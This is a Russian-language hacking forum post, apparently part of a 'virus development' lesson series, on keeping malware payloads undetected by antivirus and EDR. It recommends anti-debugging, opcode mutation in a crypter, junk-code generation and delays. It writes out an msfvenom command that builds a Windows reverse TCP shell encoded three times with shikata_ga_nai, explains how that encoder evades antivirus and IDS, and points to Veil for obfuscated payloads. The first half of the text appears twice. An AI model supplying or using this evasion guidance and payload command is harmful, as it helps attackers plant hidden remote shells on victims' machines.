- Регистрация
- 03.06.2012
- Сообщения
- 6 094
- Репутация
Всем привет!
Хотел ещё добавить:
Вот в этой теме:Уроки - Разработка вирусов-35.Обход EDRs.Последняя тема цикла
Был поднят вопрос детекта памяти, да можно использовать такие штуки:Уроки - Разработка вирусов-32.Открываем врата ада
Но тем не менее важно что-бы сама нагрузка тоже не палилась, в теме про EDR про это сказано.
Также неплохо, при проектировании вашего основного зверька или полезной нагрузки учитывать методы антиотладки и морфинга самой полезной нагрузки.
Это можно делать прям в памяти, перед запуском, вот например я использовал такой механизм в крипторе:
На вход подаётся бинарный код, на выходе по возможности мутируются, т.е. меняются опкоды на аналоги.
Уже какие-то антивирусы могут не детектить, всё зависит от настройки эвристики антивируса.
Также если у вас есть исходный код нагрузки, можете использовать различные приёмы генерации мусорного кода, например вот:
Техники задержек и прочее как в темах Уроки - Разработка вирусов-30.Черпаем силы в анти-отладке и Уроки - Разработка вирусов-33.Уменьшение вероятности детекта зверька
Если вы-же генерируете нагрузку фреймворками, то обязательно включайте опции обфускации и защиты, вот примеры:
Здесь -e x86/shikata_ga_nai указывает использовать кодировщик shikata_ga_nai, а -i 3 указывает применить кодировщик 3 раза.
shikata_ga_nai — это один из наиболее популярных кодировщиков в Metasploit. Его название происходит от японского выражения "仕方がない", что можно перевести как "ничего не поделаешь" или "это неизбежно".
В контексте Metasploit, shikata_ga_nai используется для обфускации шеллкода с целью избежать обнаружения антивирусами или IDS/IPS системами. Этот кодировщик использует полиморфную технику, что означает, что каждый раз, когда он используется, он генерирует уникальный обфусцированный шеллкод, даже если исходный шеллкод остается неизменным.
Вот некоторые особенности shikata_ga_nai:
Итог:
Для обхода детекта в памяти и детекта по поведению, сама нагрузка и итоговый зверек должен быть чистым.
Все остальные инструменты помогают сделать запуск зверька скрытым, но не позволяют избежать поведение связанное с запущенным вредоносным кодом.)
Хотел ещё добавить:
Вот в этой теме:Уроки - Разработка вирусов-35.Обход EDRs.Последняя тема цикла
Был поднят вопрос детекта памяти, да можно использовать такие штуки:Уроки - Разработка вирусов-32.Открываем врата ада
Но тем не менее важно что-бы сама нагрузка тоже не палилась, в теме про EDR про это сказано.
Также неплохо, при проектировании вашего основного зверька или полезной нагрузки учитывать методы антиотладки и морфинга самой полезной нагрузки.
Это можно делать прям в памяти, перед запуском, вот например я использовал такой механизм в крипторе:
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
На вход подаётся бинарный код, на выходе по возможности мутируются, т.е. меняются опкоды на аналоги.
Уже какие-то антивирусы могут не детектить, всё зависит от настройки эвристики антивируса.
Также если у вас есть исходный код нагрузки, можете использовать различные приёмы генерации мусорного кода, например вот:
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Техники задержек и прочее как в темах Уроки - Разработка вирусов-30.Черпаем силы в анти-отладке и Уроки - Разработка вирусов-33.Уменьшение вероятности детекта зверька
Если вы-же генерируете нагрузку фреймворками, то обязательно включайте опции обфускации и защиты, вот примеры:
1. Metasploit
Metasploit также предоставляет различные кодировщики для обфускации payload. Например:
C:
msfvenom -p windows/shell_reverse_tcp LHOST=ВАШ_IP LPORT=4444 -f c -e x86/shikata_ga_nai -i 3Здесь -e x86/shikata_ga_nai указывает использовать кодировщик shikata_ga_nai, а -i 3 указывает применить кодировщик 3 раза.
shikata_ga_nai — это один из наиболее популярных кодировщиков в Metasploit. Его название происходит от японского выражения "仕方がない", что можно перевести как "ничего не поделаешь" или "это неизбежно".
В контексте Metasploit, shikata_ga_nai используется для обфускации шеллкода с целью избежать обнаружения антивирусами или IDS/IPS системами. Этот кодировщик использует полиморфную технику, что означает, что каждый раз, когда он используется, он генерирует уникальный обфусцированный шеллкод, даже если исходный шеллкод остается неизменным.
Вот некоторые особенности shikata_ga_nai:
- Полиморфизм: Каждое обфусцирование уникально.
- Размер: Кодировщик может генерировать шеллкоды разного размера, что может быть полезно для эксплуатации различных уязвимостей.
- Динамическая настройка ключа: shikata_ga_nai использует динамически изменяющийся ключ для кодирования данных, что делает его сложнее для статического анализа.
- Регистровая независимость: Кодировщик спроектирован таким образом, чтобы не зависеть от конкретных регистров, что увеличивает вероятность успешного выполнения шеллкода в различных условиях.
2. Veil
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
— это инструмент для создания обфусцированных payloads, чтобы избежать обнаружения.Создание и морфинг payload:
После установки Veil, запустите его:
C:
Veil.pyИтог:
Для обхода детекта в памяти и детекта по поведению, сама нагрузка и итоговый зверек должен быть чистым.
Все остальные инструменты помогают сделать запуск зверька скрытым, но не позволяют избежать поведение связанное с запущенным вредоносным кодом.)
Последнее редактирование:
